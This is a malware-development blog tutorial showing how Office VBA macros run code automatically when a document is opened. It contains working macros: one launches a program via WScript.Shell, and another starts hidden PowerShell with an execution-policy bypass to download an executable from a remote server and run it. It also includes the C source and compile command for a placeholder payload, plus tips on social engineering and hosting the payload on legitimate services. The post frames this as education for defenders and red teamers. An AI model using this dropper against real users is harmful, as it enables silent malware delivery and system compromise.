4 minute read

Hello, cybersecurity enthusiasts and white hackers!

malware

Today we will consider one of the most interesting tricks in the malware development. Office Macros have long been a reliable tool for attackers looking to deliver payloads, bypass security mechanisms, and execute malicious code. In this post, we’ll explore how attackers can use Office macros to execute system commands and download malicious payloads using simple VBA code.

Macros in Office applications (like Word, Excel, and PowerPoint) are small programs written in Visual Basic for Applications (VBA), a variant of the Visual Basic programming language. These macros can automate repetitive tasks within Office documents and even interact with the system to execute commands, making them ideal for malware delivery.

Unfortunately, because Office macros are so commonly used for legitimate tasks, they have become a prime target for attackers. When an unsuspecting user opens a document with a malicious macro, the attacker’s code is executed, often without the user’s knowledge or consent.

practical example

First of all for create VBA macro, we need to create .doc document:

malware

malware

Then go to View -> Macros -> View Macros and set Macros in:

malware

malware

One of the most basic but effective ways attackers use macros is by executing system commands via the WScript.Shell object. This allows the macro to run arbitrary programs, potentially leading to system compromise. Let’s break down a simple VBA macro that executes a system application, in this case, mspaint.exe:

Sub MeowMacro()
    Set shell_object = CreateObject("WScript.Shell")
    shell_object.Exec ("mspaint.exe")
End Sub

Sub AutoOpen()
    MeowMacro
End Sub

Sub Document_Open()
    MeowMacro
End Sub

First of all, we initialize a new WScript.Shell object, which is responsible for running system commands:

Set shell_object = CreateObject("WScript.Shell")

Then:

shell_object.Exec ("mspaint.exe")

runs the mspaint.exe program (Microsoft Paint) when the macro is triggered. This is just an example of a benign application, but attackers can easily replace this with a malicious payload.

The AutoOpen and Document_Open subroutines ensure that the macro runs automatically when the document is opened.

demo

Let’s go to see everything in action. Create vba scipt in our meow.doc document:

malware

and reopen it:

malware

As you can see, we need to enable Macro (you will see the alert about Macro only on .doc or .docm extensions). After enable, wait execution:

malware

malware

As you can see, everything is worked perfectly, as expected! =^..^=

In real attacks there are many different social engineering methods that will force your victim to enable macros in Microsoft Office.

What can we do with this technique? The above macro could be used for a range of purposes, from launching benign applications to running malicious ones. More commonly, attackers might launch malicious executables or scripts that could compromise the system further.

practical example 2

In the next example, we’ll take this one step further by combining the macro with PowerShell commands to download and execute a malware. This method bypasses traditional execution policies and uses the WScript.Shell object to run the PowerShell script.

First of all, we need malware. Let’s say we have a “malware”:

/*
 * hack.c
 * evil app for windows
 * for macro
 * author: @cocomelonc
 * https://cocomelonc.github.io/malware/2025/07/01/malware-tricks-48.html
*/
#include <windows.h>
#pragma comment (lib, "user32.lib")

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {
  MessageBox(NULL, "Meow-meow!", "=^..^=", MB_OK);
  return 0;
}

Then, we need downloading this malicious soft:

(New-Object System.Net.WebClient).DownloadFile('http://192.168.56.1:8888/hack.exe', 'C:\temp\hack.exe')

instructs PowerShell to download the malicious file hack.exe from a remote server http://192.168.56.1:8888/hack.exe and save it locally on the victim’s machine at C:\temp\hack.exe.

Finally

Start-Process C:\temp\hack.exe

executes the downloaded malicious file once it has been saved to the victim’s system.

As with the first example, the AutoOpen and Document_Open subroutines automatically execute the macro when the document is opened.

Full source code of this VBA looks like this:

Sub MeowMacro()
    ' PowerShell ignore Execution policy
    Dim psScript As String
    psScript = "powershell.exe -ExecutionPolicy Bypass -window-style hidden (New-Object System.Net.WebClient).DownloadFile('http://192.168.56.1:8888/hack.exe', 'C:\temp\hack.exe'); Start-Process C:\temp\hack.exe"

    ' using WScript.Shell for run PowerShell
    Dim shell_object As Object
    Set shell_object = CreateObject("WScript.Shell")
    shell_object.Run psScript, 0, False ' 0 - hidden mode, False - no wait

    MsgBox "powershell script executed successfully."
End Sub

Sub AutoOpen()
    MeowMacro
End Sub

Sub Document_Open()
    MeowMacro
End Sub

So, how it works? When the victim opens the malicious document, the macro is triggered and the PowerShell script is executed.

demo 2

Let’s go to see second example in practice. First of all, compile our malware:

x86_64-w64-mingw32-g++ hack.c -o hack.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -fpermissive

malware

For checking correctness, try to run it manually in the Windows VM:

.\hack.exe

malware

Then, create meow2.doc document:

malware

And do the same steps as in the first example for create macros:

malware

malware

malware

As you can see, for simplicity, use local server for hosting my hack.exe “malware”:

malware

malware

but in real attacks you can abuse something legit.

Then, reopen meow2.doc and enable macro:

malware

malware

malware

malware

Even if you close Word document, malicious hack.exe still worked without any crashes:

malware

malware

As you can see, everything is worked as expected! =^..^=

Let’s update this sample to ANY.RUN:

malware

malware

malware

But for real analysis, we need to host our hack.exe in Github or file hosting, or any legit hosting.

But still this file is recognized as malicious:

malware

malware

malware

https://app.any.run/tasks/5708ac3e-1c7d-42ac-af8f-85e6c5bf7d7e

This simple trick is still used by various APT groups like Sandworm, APT33, APT37 and APT38

I hope this post is useful for malware researchers, C/C++ and VBA programmers, spreads awareness to the blue teamers of this interesting classic leveraging Office macros technique, and adds a weapon to the red teamers arsenal.

malware

Thanks to ANY.RUN for API!

MITRE ATT&CK Techniques: Visual Basic
ANY.RUN
ANY.RUN: meow2.doc
APT33
APT37
APT38
Sandworm
Sandworm: MITRE
source code in Github

This is a practical case for educational purposes only.

Thanks for your time happy hacking and good bye!
PS. All drawings and screenshots are mine